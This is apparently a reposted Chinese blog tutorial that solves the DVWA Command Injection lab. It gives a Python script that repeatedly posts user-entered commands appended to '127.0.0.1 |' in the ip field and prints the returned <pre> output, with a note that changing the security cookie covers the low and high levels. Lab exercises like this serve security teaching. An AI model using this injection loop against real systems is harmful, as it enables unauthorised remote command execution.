栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

dvwa——Command Injection初级、中级和高级python脚本解法(一)

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

dvwa——Command Injection初级、中级和高级python脚本解法(一)

输入127.0.0.1命令,查看DVWA的command execute页面的源代码,如下图所示:

 通过查询得知pre是唯一的,因此需要将返回页面中的pre标签提取出来,最为方便的是使用BeautifulSoup模块,这个模块的主要功能是解析并提取网页中的数据。

python爬虫——Beautiful Soup库(数据解析)详细说明_xiaofengdada的博客-CSDN博客

python爬虫——request模块(一)_xiaofengdada的博客-CSDN博客_python request

话不多说,直接上源码,不懂参考上面博客:
import requests
#import json
from bs4 import BeautifulSoup
while True:
    cmd = input("请输入您要执行的命令行:").strip()
    #if len(cmd) == 0:
        #continue
    if cmd == 'quit':
        break
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
        'cookie':'security=medium; PHPSESSID=9fvvn8hc6iq55cs3vgbpahvoj0'
    }
    url = "http://x.x.x.x/dvwa/vulnerabilities/exec/#"
    data = {
        'ip':'127.0.0.1 |%s'%cmd,
        'Submit':'Submit'
    }
    res = requests.post(url=url,headers=header,data=data)
    #print(res.text)
    marry =BeautifulSoup(res.text,'lxml')
    for pre in marry.find_all(name='pre'):
        print(pre.string)

输出结果:

初级和高级的只要把请求头里面的security设置为low和high即可!

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/714213.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号